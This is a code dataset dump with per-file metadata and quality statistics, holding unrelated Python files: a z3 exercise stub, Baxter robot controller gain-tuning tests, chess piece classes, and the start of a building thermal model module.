hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca30cbd11f41f0eefe928d5521c19a48f14a1efc | 137 | py | Python | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 6 | 2021-02-16T18:12:57.000Z | 2021-03-18T16:44:26.000Z | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 38 | 2021-02-16T15:17:49.000Z | 2021-08-24T07:28:39.000Z | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 7 | 2021-02-17T14:04:33.000Z | 2021-06-01T08:16:50.000Z | from z3 import *
def propositional_logic_proofs(A, B):
# TODO: Write your code here
# Return the 3 theorems in order
pass
| 15.222222 | 37 | 0.678832 | 21 | 137 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.262774 | 137 | 8 | 38 | 17.125 | 0.881188 | 0.416058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0.333333 | false | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
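The `propositional_logic.py` stub above leaves the proofs unimplemented. The exercise itself expects z3 (where a tautology check is `Solver().add(Not(formula))` followed by `check() == unsat`), but the target behavior can be sketched dependency-free with a truth-table check; `is_tautology` and the formulas below are illustrative, not part of the exercise API:

```python
from itertools import product

def is_tautology(formula, num_vars):
    # A propositional formula is a tautology iff it evaluates to True
    # under every assignment of truth values to its variables.
    return all(
        formula(*values)
        for values in product([False, True], repeat=num_vars)
    )

# Modus ponens, (A and (A -> B)) -> B, with "->" written as "not ... or ...":
modus_ponens = lambda a, b: not (a and ((not a) or b)) or b
print(is_tautology(modus_ponens, 2))  # True
print(is_tautology(lambda a, b: a or b, 2))  # False
```

Enumerating assignments is exponential in the number of variables, which is exactly why the exercise reaches for an SMT solver instead.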
ca62c2c71ff1a289688163e7d50e8123d9a5185d | 18,934 | py | Python | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/openTAMP-legacy | 3b7c3be164cc968ad77a928286d6460cd70a670e | [
"MIT"
] | 2 | 2022-03-09T19:48:20.000Z | 2022-03-26T17:31:07.000Z | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | import unittest, time, main, ipdb
import numpy as np
from mujoco_py import mjcore, mjviewer
from mujoco_py.mjlib import mjlib
from core.parsing import parse_domain_config, parse_problem_config
from core.util_classes.plan_hdf5_serialization import PlanDeserializer
from pma import hl_solver
from opentamp.src.policy_hooks import baxter_controller, policy_solver_utils, tamp_agent
def load_environment(domain_file, problem_file):
domain_fname = domain_file
d_c = main.parse_file_to_dict(domain_fname)
domain = parse_domain_config.ParseDomainConfig.parse(d_c)
p_fname = problem_file
p_c = main.parse_file_to_dict(p_fname)
problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)
params = problem.init_state.params
return domain, problem, params
def traj_retiming(plan, velocity):
baxter = plan.params['baxter']
rave_body = baxter.openrave_body
body = rave_body.env_body
lmanip = body.GetManipulator("left_arm")
rmanip = body.GetManipulator("right_arm")
left_ee_pose = []
right_ee_pose = []
for t in range(plan.horizon):
rave_body.set_dof({
'lArmPose': baxter.lArmPose[:, t],
'lGripper': baxter.lGripper[:, t],
'rArmPose': baxter.rArmPose[:, t],
'rGripper': baxter.rGripper[:, t]
})
rave_body.set_pose([0,0,baxter.pose[:, t]])
left_ee_pose.append(lmanip.GetTransform()[:3, 3])
right_ee_pose.append(rmanip.GetTransform()[:3, 3])
time = np.zeros(plan.horizon)
# import ipdb; ipdb.set_trace()
for t in range(plan.horizon-1):
left_dist = np.linalg.norm(left_ee_pose[t+1] - left_ee_pose[t])
right_dist = np.linalg.norm(right_ee_pose[t+1] - right_ee_pose[t])
time_spend = max(left_dist, right_dist)/velocity[t]
time[t+1] = time_spend
return time
class TestBaxterController(unittest.TestCase):
def find_baxter_mujoco_pos_vel_controller(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
# pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
# vel_gains = 5e-3
pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
vel_gains = 5e-3
# controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
# viewer = mjviewer.MjViewer()
# viewer.start()
# viewer.set_model(model)
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# curr_pos_tracker = None
best_avg_err = np.ones((16,))
best_gains = np.zeros((32,))
good_gains = []
for pos_exp in range(-1,2):
for vel_exp in range(-5, -4):
for i in range(10):
pos_gains = np.ones((16)) * i * 10**pos_exp
vel_gains = np.zeros((16,))  # velocity gains deliberately disabled in this sweep
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques += controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.0002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
print(best_avg_err)
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err <= 1e-3):
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
for _ in range(10):
pos_gains = np.random.random((16,)) * 10**pos_exp
vel_gains = np.zeros((16,))  # velocity gains deliberately disabled in this sweep
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques += controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.0002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err <= 1e-3):
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
print(best_avg_err)
print(best_gains)
print(good_gains)
print(best_avg_err)
np.save('best_gains_2', best_gains)
np.save('good_gains_2', np.array(good_gains))
# print curr_pos_error
# if curr_pos_tracker is not None:
# print("Error trend")
# print curr_pos_error - curr_pos_tracker
# curr_pos_tracker = curr_pos_error
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# ipdb.set_trace()
return True
def evaluate_pos_vel_gains(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
pos_gains = 250 * np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
vel_gains = 1e1
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
viewer = mjviewer.MjViewer()
viewer.start()
viewer.set_model(model)
viewer.cam.distance = 5
viewer.cam.azimuth = 220
viewer.cam.elevation = -20
viewer.loop_once()
import ipdb; ipdb.set_trace()
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.ones((16,)) * 0.00001
error_limits = np.array([.2, .75, .2, .075, .075, .5, .001, .001, .05, .5, .2, .075, .075, .5, .001, .001,])
for t in range(0, 30):
cur_t = 0
cur_pos_error = np.ones((16,))
i = 1.0
while np.any(cur_pos_error > error_limits) and i < 100:  # alternatively: cur_t < plan.time[:, t]
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
i += 1.0
print(cur_pos_error)
avg_err += cur_pos_error
viewer.loop_once()
import ipdb; ipdb.set_trace()
avg_err /= 30
print(avg_err)
def run_baxter_mujoco_pos_vel_controller(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
# pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
# vel_gains = 5e-3
pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
vel_gains = 5e-3
# controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
# viewer = mjviewer.MjViewer()
# viewer.start()
# viewer.set_model(model)
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# curr_pos_tracker = None
best_avg_err = np.ones((16,))
best_gains = np.zeros((32,))
good_gains = []
for pos_exp in range(-4, 2):
for vel_exp in range(-3, -2):
for i in range(10):
pos_gains = np.ones((16)) * i * 10**pos_exp
vel_gains = np.ones((16,)) * np.random.uniform(0, 10) * 10**vel_exp
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err <= 1e-3):
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
for _ in range(10):
pos_gains = np.random.random((16,)) * 10**pos_exp
vel_gains = np.random.random((16,)) * 10**vel_exp
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err <= 1e-3):
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
print(best_gains)
print(good_gains)
print(best_avg_err)
np.save('best_gains', best_gains)
np.save('good_gains', np.array(good_gains))
# print curr_pos_error
# if curr_pos_tracker is not None:
# print("Error trend")
# print curr_pos_error - curr_pos_tracker
# curr_pos_tracker = curr_pos_error
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# ipdb.set_trace()
return True
| 44.973872 | 256 | 0.535914 | 2,367 | 18,934 | 4.033798 | 0.087452 | 0.010054 | 0.012568 | 0.013406 | 0.855467 | 0.85023 | 0.829912 | 0.829912 | 0.823837 | 0.821848 | 0 | 0.041952 | 0.345358 | 18,934 | 420 | 257 | 45.080952 | 0.728358 | 0.078272 | 0 | 0.754658 | 0 | 0 | 0.030684 | 0.003792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015528 | false | 0 | 0.031056 | 0 | 0.062112 | 0.031056 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
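Both sweep methods in `test_baxter_controller.py` above share one pattern: grid over gain exponents, sample candidate gain vectors, simulate, and keep the pair with the lowest mean tracking error. Decoupled from MuJoCo, that pattern looks roughly like this; `evaluate` stands in for the simulate-and-measure loop, and all names here are illustrative:

```python
import numpy as np

def search_gains(evaluate, pos_exps, vel_exps, samples=10, seed=0):
    # evaluate(pos_gains, vel_gains) -> per-joint error vector (length 16).
    # Mirrors the nested exponent/sample loops in the test methods above.
    rng = np.random.default_rng(seed)
    best_err, best_gains = np.inf, None
    for pos_exp in pos_exps:
        for vel_exp in vel_exps:
            for _ in range(samples):
                pos_gains = rng.random(16) * 10.0 ** pos_exp
                vel_gains = rng.random(16) * 10.0 ** vel_exp
                err = float(np.mean(evaluate(pos_gains, vel_gains)))
                if err < best_err:
                    best_err, best_gains = err, np.r_[pos_gains, vel_gains]
    return best_err, best_gains
```

The real tests additionally reset the simulator state between candidates and collect every gain pair whose per-joint error stays below a threshold into `good_gains`.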
ca6f6f03f62a44f7b7f6168b30606dc444d6da2f | 2,607 | py | Python | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | 1 | 2021-04-13T00:25:20.000Z | 2021-04-13T00:25:20.000Z | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | null | null | null | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | null | null | null | class Piece:
"""A chess piece located on the chess board.
=== Public Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
"""Initialize a new Piece with a given colour.
"""
self.colour = colour
class Pawn(Piece):
"""A chess pawn located on the chess board.
=== Public Attributes ===
start:
True if the pawn has yet to make a move, False if it has moved.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
start: bool
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
self.start = True
def made_first_move(self) -> None:
self.start = False
class Knight(Piece):
"""A chess knight located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Rook(Piece):
"""A chess rook located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Bishop(Piece):
"""A chess bishop located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Queen(Piece):
"""A chess queen located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class King(Piece):
"""A chess king located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
| 24.364486 | 76 | 0.518604 | 304 | 2,607 | 4.269737 | 0.157895 | 0.086287 | 0.140216 | 0.09168 | 0.755008 | 0.755008 | 0.755008 | 0.70416 | 0.70416 | 0.70416 | 0 | 0 | 0.37898 | 2,607 | 106 | 77 | 24.59434 | 0.801729 | 0.432681 | 0 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.71875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
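The `pieces.py` classes above track only a colour and, for pawns, a `start` flag. A condensed sketch of how that flag would gate the pawn's two-square opening move; the `legal_step_sizes` method is hypothetical and not part of `pieces.py`:

```python
class Pawn:
    """Condensed copy of the Pawn above, for illustration only."""

    def __init__(self, colour: str) -> None:
        self.colour = colour
        self.start = True

    def legal_step_sizes(self) -> list:
        # A pawn may advance two squares only before its first move.
        return [1, 2] if self.start else [1]

    def made_first_move(self) -> None:
        self.start = False

pawn = Pawn('W')
print(pawn.legal_step_sizes())  # [1, 2]
pawn.made_first_move()
print(pawn.legal_step_sizes())  # [1]
```

A move-validation layer would call `made_first_move` after executing a pawn's move, which is exactly the hook the original class exposes.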
ca94c4ce9066d44ccbef8e92f79377d48322c5ac | 207,512 | py | Python | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 5 | 2019-03-08T06:10:08.000Z | 2021-04-20T13:40:59.000Z | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 4 | 2019-04-10T03:14:12.000Z | 2021-01-08T09:00:08.000Z | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 3 | 2019-09-02T21:18:52.000Z | 2021-04-26T01:23:37.000Z | """Building model module."""
import cvxpy as cp
import numpy as np
import pandas as pd
import scipy.linalg
import scipy.interpolate
import typing
import cobmo.config
import cobmo.data_interface
import cobmo.utils
logger = cobmo.config.get_logger(__name__)
class BuildingModel(object):
"""Building model object consisting of the state space model for the given scenario. The model includes
index sets for states / controls / disturbances / outputs, the state / control / disturbance / state-output /
control-output / disturbance-output matrices and disturbance / electricity price / output constraint timeseries.
- The building model object constructs the state space model matrices and index sets
according to the building model equations, which are documented in CoBMo's technical documentation.
- The required `building_data` object for the given scenario is obtained from the database
through `cobmo.data_interface`.
- The building can be connected to the electric grid, the thermal grid or both, which is controlled through the
keyword arguments `connect_electric_grid` / `connect_thermal_grid_cooling` / `connect_thermal_grid_heating`
as explained below.
Syntax
``BuildingModel(scenario_name)``: Instantiate building model for given `scenario_name`.
Parameters:
scenario_name (str): CoBMo building scenario name, as defined in the data table `scenarios`.
Keyword Arguments:
timestep_start (pd.Timestamp): If provided, will be used in place of `timestep_start` from the scenario definition.
timestep_end (pd.Timestamp): If provided, will be used in place of `timestep_end` from the scenario definition.
timestep_interval (pd.Timedelta): If provided, will be used in place of `timestep_interval` from the scenario definition.
